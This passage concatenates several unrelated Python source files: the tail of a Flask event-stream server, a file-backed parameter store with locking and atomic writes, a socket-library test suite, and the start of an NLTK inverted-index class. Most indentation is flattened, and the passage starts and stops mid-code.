yield "event: move\ndata: %d\n\n" % (tmpMove)
#yield "event: test\ndata: %d\n\n" % (calculatedBeat)
time.sleep(0.02) # an artificial delay
return Response(events(), content_type='text/event-stream')
if __name__ == '__main__':
server = MuseServer()
server.start()
ser.start()
print("Starting local server")
# serve()
app.run("0.0.0.0", port=8080, threaded=True)
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
            if e.errno == errno.ENOENT:
                self._vals = {}
                return self
            raise
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
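# Example (sketch, not part of the upstream module): exercises the Params API against a
# throwaway directory so nothing touches the real PARAMS path. Key names must exist in
# the `keys` table above; "Version" and "UpdateAvailable" are used purely as samples, and
# the helpers referenced earlier in this module (mkdirs_exists_ok, TxType, keys) are
# assumed to be defined above.
if __name__ == "__main__":
    example_db = tempfile.mkdtemp(prefix="params-example.")
    p = Params(db=example_db)
    p.put("Version", b"0.0.1")                 # blocks until the value is fsync'd to disk
    p.put("UpdateAvailable", b"1")
    print(p.get("Version", encoding="utf8"))   # -> "0.0.1"
    p.manager_start()                          # wipes every CLEAR_ON_MANAGER_START key
    print(p.get("UpdateAvailable"))            # -> None
    shutil.rmtree(example_db)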
|
test_rsocket.py
|
import py, errno, sys
from rpython.rlib import rsocket
from rpython.rlib.rsocket import *
import socket as cpy_socket
from rpython.translator.c.test.test_genc import compile
def setup_module(mod):
rsocket_startup()
def test_ipv4_addr():
a = INETAddress("localhost", 4000)
assert a.get_host() == "127.0.0.1"
assert a.get_port() == 4000
a = INETAddress("", 4001)
assert a.get_host() == "0.0.0.0"
assert a.get_port() == 4001
a = INETAddress("<broadcast>", 47002)
assert a.get_host() == "255.255.255.255"
assert a.get_port() == 47002
py.test.raises(GAIError, INETAddress, "no such host exists", 47003)
res = repr(a)
assert res == "<INETAddress 255.255.255.255:47002>"
def test_unix_addr():
if getattr(rsocket, 'AF_UNIX', None) is None:
py.test.skip('AF_UNIX not supported.')
a = UNIXAddress("/tmp/socketname")
assert a.get_path() == "/tmp/socketname"
def test_netlink_addr():
if getattr(rsocket, 'AF_NETLINK', None) is None:
py.test.skip('AF_NETLINK not supported.')
pid = 1
group_mask = 64 + 32
a = NETLINKAddress(pid, group_mask)
assert a.get_pid() == pid
assert a.get_groups() == group_mask
def test_gethostname():
s = gethostname()
assert isinstance(s, str)
def test_gethostbyname():
for host in ["localhost", "127.0.0.1"]:
a = gethostbyname(host)
assert isinstance(a, INETAddress)
assert a.get_host() == "127.0.0.1"
def test_gethostbyname_ex():
for host in ["localhost", "127.0.0.1"]:
name, aliases, address_list = gethostbyname_ex(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert host in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
# no IPV6, should always return IPV4
else:
py.test.fail("could not find the localhost address in %r"
% (address_list,))
def test_gethostbyaddr():
try:
cpy_socket.gethostbyaddr("::1")
except cpy_socket.herror:
ipv6 = HSocketError
except cpy_socket.gaierror:
ipv6 = GAIError
else:
ipv6 = None
for host in ["localhost", "127.0.0.1", "::1"]:
if host == "::1" and ipv6:
with py.test.raises(ipv6):
gethostbyaddr(host)
continue
name, aliases, address_list = gethostbyaddr(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert 'localhost' in allnames or 'ip6-localhost' in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
if host != '127.0.0.1': # name lookup might return IPV6
if isinstance(a, INET6Address) and a.get_host() == "::1":
break # ok
else:
py.test.fail("could not find the localhost address in %r"
% (address_list,))
def test_getservbyname():
assert getservbyname('http') == 80
assert getservbyname('http', 'tcp') == 80
def test_getservbyport():
assert getservbyport(80) == cpy_socket.getservbyport(80)
assert getservbyport(80, 'tcp') == cpy_socket.getservbyport(80)
def test_getprotobyname():
assert getprotobyname('tcp') == IPPROTO_TCP
assert getprotobyname('udp') == IPPROTO_UDP
def test_socketpair():
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
s1.sendall('?')
buf = s2.recv(100)
assert buf == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
buf = s1.recv(100)
assert buf == 'x'*count
s1.close()
s2.close()
def test_socketpair_recvinto():
class Buffer:
def setslice(self, start, string):
self.x = string
def as_str(self):
return self.x
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
s2.recvinto(buf, 1)
assert buf.as_str() == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
s1.recvinto(buf, 100)
assert buf.as_str() == 'x'*count
s1.close()
s2.close()
def test_simple_tcp():
from rpython.rlib import rthread
sock = RSocket()
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
sock.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
connected = [False] #thread-mutable list
def connecting():
try:
s2.connect(addr)
connected[0] = True
finally:
lock.release()
lock = rthread.allocate_lock()
lock.acquire(True)
rthread.start_new_thread(connecting, ())
print 'waiting for connection'
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
print 'connection accepted'
lock.acquire(True)
assert connected[0]
print 'connecting side knows that the connection was accepted too'
assert addr.eq(s2.getpeername())
#assert addr2.eq(s2.getsockname())
assert addr2.eq(s1.getpeername())
s1.send('?')
print 'sent one character'
buf = s2.recv(100)
assert buf == '?'
print 'received ok'
def sendstuff():
s2.sendall('x'*50000)
rthread.start_new_thread(sendstuff, ())
buf = ''
while len(buf) < 50000:
data = s1.recv(50100)
        print 'recv returned %d bytes' % (len(data),)
assert data
buf += data
assert buf == 'x'*50000
print 'data received ok'
s1.shutdown(SHUT_RDWR)
s1.close()
s2.close()
def test_simple_udp():
s1 = RSocket(AF_INET, SOCK_DGRAM)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
s1.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(s1.getsockname())
s2 = RSocket(AF_INET, SOCK_DGRAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
s2.bind(INETAddress('127.0.0.1', INADDR_ANY))
addr2 = s2.getsockname()
s1.sendto('?', 0, addr2)
buf = s2.recv(100)
assert buf == '?'
s2.connect(addr)
count = s2.send('x'*99)
assert 1 <= count <= 99
buf, addr3 = s1.recvfrom(100)
assert buf == 'x'*count
print addr2, addr3
assert addr2.get_port() == addr3.get_port()
s1.close()
s2.close()
def test_nonblocking():
sock = RSocket()
sock.setblocking(False)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
sock.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
err = py.test.raises(CSocketError, sock.accept)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.setblocking(False)
err = py.test.raises(CSocketError, s2.connect, addr)
assert err.value.errno in (errno.EINPROGRESS, errno.EWOULDBLOCK)
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
s1.setblocking(False)
assert addr.eq(s2.getpeername())
assert addr2.get_port() == s2.getsockname().get_port()
assert addr2.eq(s1.getpeername())
err = s2.connect_ex(addr) # should now work
assert err in (0, errno.EISCONN)
s1.send('?')
import time
time.sleep(0.01) # Windows needs some time to transfer data
buf = s2.recv(100)
assert buf == '?'
err = py.test.raises(CSocketError, s1.recv, 5000)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
count = s2.send('x'*50000)
assert 1 <= count <= 50000
while count: # Recv may return less than requested
buf = s1.recv(count + 100)
assert len(buf) <= count
assert buf.count('x') == len(buf)
count -= len(buf)
# Check that everything has been read
err = py.test.raises(CSocketError, s1.recv, 5000)
s1.close()
s2.close()
def test_getaddrinfo_http():
lst = getaddrinfo('localhost', 'http')
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if (family == AF_INET and
socktype == SOCK_STREAM and
addr.get_host() == '127.0.0.1' and
addr.get_port() == 80):
found = True
assert found, lst
# The following might fail if the DNS redirects failed requests to a
# catch-all address (i.e. opendns).
e = py.test.raises(GAIError, getaddrinfo, 'www.very-invalidaddress.com', None)
assert isinstance(e.value.get_msg(), str)
def getaddrinfo_pydotorg(i, result):
lst = getaddrinfo('python.org', None)
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if addr.get_host() == '104.130.43.121':
found = True
result[i] += found
def test_getaddrinfo_pydotorg():
result = [0,]
getaddrinfo_pydotorg(0, result)
assert result[0] == 1
def test_getaddrinfo_no_reverse_lookup():
# It seems that getaddrinfo never runs a reverse lookup on Linux.
# Python2.3 on Windows returns the hostname.
lst = getaddrinfo('82.94.164.162', None, flags=AI_NUMERICHOST)
assert isinstance(lst, list)
found = False
print lst
for family, socktype, protocol, canonname, addr in lst:
assert 'python.org' not in canonname
if addr.get_host() == '82.94.164.162':
found = True
assert found, lst
def test_getaddrinfo_osx_crash():
# see CPython issue17269
for port in [None, '0', '00']:
getaddrinfo('localhost', port, 0, 0, 0, AI_NUMERICSERV)
def test_connect_ex():
s = RSocket()
err = s.connect_ex(INETAddress('0.0.0.0', 0)) # should not work
assert err in (errno.ECONNREFUSED, errno.EADDRNOTAVAIL)
s.close()
def test_connect_with_timeout_fail():
s = RSocket()
s.settimeout(0.1)
with py.test.raises(SocketTimeout):
s.connect(INETAddress('172.30.172.30', 12345))
s.close()
def test_connect_with_timeout_succeed():
s = RSocket()
s.settimeout(10.0)
s.connect(INETAddress('python.org', 80))
s.close()
def test_getsetsockopt():
import struct
assert struct.calcsize("i") == rffi.sizeof(rffi.INT)
    # A socket should start with reuse == 0
s = RSocket(AF_INET, SOCK_STREAM)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse == 0
s.setsockopt_int(SOL_SOCKET, SO_REUSEADDR, 1)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse != 0
# Test string case
s = RSocket(AF_INET, SOCK_STREAM)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value == 0
optstr = struct.pack("i", 1)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, optstr)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value != 0
def test_dup():
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
if sys.platform == "win32":
assert not hasattr(s, 'dup')
return
s2 = s.dup()
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_c_dup():
# rsocket.dup() duplicates fd, it also works on Windows
# (but only on socket handles!)
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
s2 = RSocket(fd=dup(s.fd))
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_inet_aton():
assert inet_aton('1.2.3.4') == '\x01\x02\x03\x04'
assert inet_aton('127.0.0.1') == '\x7f\x00\x00\x01'
tests = ["127.0.0.256", "127.0.0.255555555555555555", "127.2b.0.0",
"127.2.0.0.1", "127.2.0."]
for ip in tests:
py.test.raises(SocketError, inet_aton, ip)
# Windows 2000: missing numbers are replaced by 0
for ip, aton in [("11..22.33", '\x0b\x00\x16\x21'),
(".11.22.33", '\x00\x0b\x16\x21')]:
try:
assert inet_aton(ip) == aton
except SocketError:
pass
def test_inet_ntoa():
assert inet_ntoa('\x01\x02\x03\x04') == '1.2.3.4'
def test_inet_pton():
if not hasattr(rsocket, 'inet_pton'):
py.test.skip("no inet_pton()")
assert inet_pton(AF_INET, '1.2.3.5') == '\x01\x02\x03\x05'
py.test.raises(SocketError, inet_pton, AF_INET, '127.0.0.256')
def test_inet_ntop():
if not hasattr(rsocket, 'inet_ntop'):
py.test.skip("no inet_ntop()")
assert inet_ntop(AF_INET, '\x01\x02\x03\x05') == '1.2.3.5'
def test_unix_socket_connect():
if getattr(rsocket, 'AF_UNIX', None) is None:
py.test.skip('AF_UNIX not supported.')
from rpython.tool.udir import udir
sockpath = str(udir.join('test_unix_socket_connect'))
a = UNIXAddress(sockpath)
serversock = RSocket(AF_UNIX)
serversock.bind(a)
serversock.listen(1)
clientsock = RSocket(AF_UNIX)
clientsock.connect(a)
fd, addr = serversock.accept()
s = RSocket(AF_UNIX, fd=fd)
s.send('X')
data = clientsock.recv(100)
assert data == 'X'
clientsock.send('Y')
data = s.recv(100)
assert data == 'Y'
clientsock.close()
s.close()
class TestTCP:
PORT = 50007
HOST = 'localhost'
def setup_method(self, method):
self.serv = RSocket(AF_INET, SOCK_STREAM)
self.serv.bind(INETAddress(self.HOST, self.PORT))
self.serv.listen(1)
def teardown_method(self, method):
self.serv.close()
self.serv = None
def test_timeout(self):
def raise_timeout():
self.serv.settimeout(1.0)
self.serv.accept()
py.test.raises(SocketTimeout, raise_timeout)
def test_timeout_zero(self):
def raise_error():
self.serv.settimeout(0.0)
foo = self.serv.accept()
py.test.raises(SocketError, raise_error)
def _test_cond_include(cond):
# Test that _rsocket_rffi is importable even on platforms where
# AF_PACKET or AF_NETLINK is not defined.
import re
from rpython.rlib import _rsocket_rffi
srcfile = _rsocket_rffi.__file__
if srcfile.lower().endswith('c') or srcfile.lower().endswith('o'):
srcfile = srcfile[:-1] # .pyc => .py
assert srcfile.lower().endswith('.py')
sourcelines = open(srcfile, 'rb').read().splitlines()
found = False
for i, line in enumerate(sourcelines):
line2 = re.sub(r"(\s*COND_HEADER\s*=)",
r"\1'#undef %s\\n'+" % cond,
line)
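        # The substitution rewrites e.g. `COND_HEADER = <expr>` into
        # `COND_HEADER = '#undef %s\n' + <expr>` for the requested constant, so the
        # re-executed module behaves as if that constant were missing on this platform.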
if line2 != line:
found = True
sourcelines[i] = line2
assert found
d = {}
sourcelines.append('')
exec '\n'.join(sourcelines) in d
def test_no_AF_PACKET():
_test_cond_include('AF_PACKET')
def test_no_AF_NETLINK():
_test_cond_include('AF_NETLINK')
def test_thread_safe_gethostbyaddr():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
ip = '8.8.8.8'
domain = gethostbyaddr(ip)[0]
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_addr(ip, i):
name, aliases, address_list = gethostbyaddr(ip, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_addr, args=[ip, i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_thread_safe_gethostbyname_ex():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
domain = 'google.com'
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_name(i):
name, aliases, address_list = gethostbyname_ex(domain, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_name, args=[i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_getaddrinfo_pydotorg_threadsafe():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
result = [0] * nthreads
threads = [None] * nthreads
for i in range(nthreads):
threads[i] = threading.Thread(target = getaddrinfo_pydotorg, args=[i, result])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_translate_netdb_lock():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [])
assert fc() == 0
def test_translate_netdb_lock_thread():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [], thread=True)
assert fc() == 0
|
__init__.py
|
import operator, math, queue, threading, pickle
from nltk.tokenize import RegexpTokenizer
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords as stopwords_from_nltk
# stopwords from nltk
# {‘ourselves’, ‘hers’, ‘between’, ‘yourself’, ‘but’, ‘again’, ‘there’, ‘about’, ‘once’, ‘during’, ‘out’, ‘very’, ‘having’, ‘with’, ‘they’, ‘own’, ‘an’, ‘be’, ‘some’, ‘for’, ‘do’, ‘its’, ‘yours’, ‘such’, ‘into’, ‘of’, ‘most’, ‘itself’, ‘other’, ‘off’, ‘is’, ‘s’, ‘am’, ‘or’, ‘who’, ‘as’, ‘from’, ‘him’, ‘each’, ‘the’, ‘themselves’, ‘until’, ‘below’, ‘are’, ‘we’, ‘these’, ‘your’, ‘his’, ‘through’, ‘don’, ‘nor’, ‘me’, ‘were’, ‘her’, ‘more’, ‘himself’, ‘this’, ‘down’, ‘should’, ‘our’, ‘their’, ‘while’, ‘above’, ‘both’, ‘up’, ‘to’, ‘ours’, ‘had’, ‘she’, ‘all’, ‘no’, ‘when’, ‘at’, ‘any’, ‘before’, ‘them’, ‘same’, ‘and’, ‘been’, ‘have’, ‘in’, ‘will’, ‘on’, ‘does’, ‘yourselves’, ‘then’, ‘that’, ‘because’, ‘what’, ‘over’, ‘why’, ‘so’, ‘can’, ‘did’, ‘not’, ‘now’, ‘under’, ‘he’, ‘you’, ‘herself’, ‘has’, ‘just’, ‘where’, ‘too’, ‘only’, ‘myself’, ‘which’, ‘those’, ‘i’, ‘after’, ‘few’, ‘whom’, ‘t’, ‘being’, ‘if’, ‘theirs’, ‘my’, ‘against’, ‘a’, ‘by’, ‘doing’, ‘it’, ‘how’, ‘further’, ‘was’, ‘here’, ‘than’}
class Index:
tokenizer = RegexpTokenizer(r'\w+')
stop_words = stopwords_from_nltk.words()
stemmer = PorterStemmer()
def __init__(self):
self._thread_lock = threading.Lock()
self._doc_set = set()
self._index_dict = {}
self._index_queue = queue.Queue()
def print(self, content):
print(content)
@staticmethod # A static method doesn't receive any reference argument whether it is called by an instance of a class or by the class itself
def clean(content):
tokens = Index.tokenizer.tokenize(content)
tokens = [Index.stemmer.stem(i) for i in tokens if i not in Index.stop_words]
return tokens
def index(self, document_id, content):
tokens = Index.clean(content) # remove ? ! . , and stopwords
token_set = set(tokens)
for token in token_set:
token_count = tokens.count(token)
self._update_inverted_index(token, document_id, token_count)
self._doc_set.add(document_id)
return
    def _update_inverted_index(self, token, document, count):
        # Hold the lock around the whole check-and-update so two worker threads cannot
        # both miss the token and clobber each other's entry.
        with self._thread_lock:
            if token not in self._index_dict:
                self._index_dict[token] = {
                    'count': count,
                    'frequency': {document: count}
                }
            else:
                self._index_dict[token]['frequency'][document] = count
                self._index_dict[token]['count'] += count
def get_documents_containing_word(self, token, count=None, text_=True):
token = Index.clean(token)
if len(token) == 0:
return []
token = token[0]
docs = self._index_dict.get(token, {'frequency': {}})['frequency']
        #self.print(self._index_dict)
        sorted_docs = sorted(docs.items(), key=operator.itemgetter(1), reverse=False)
        doc_list = list(sorted_docs)
        if not text_:
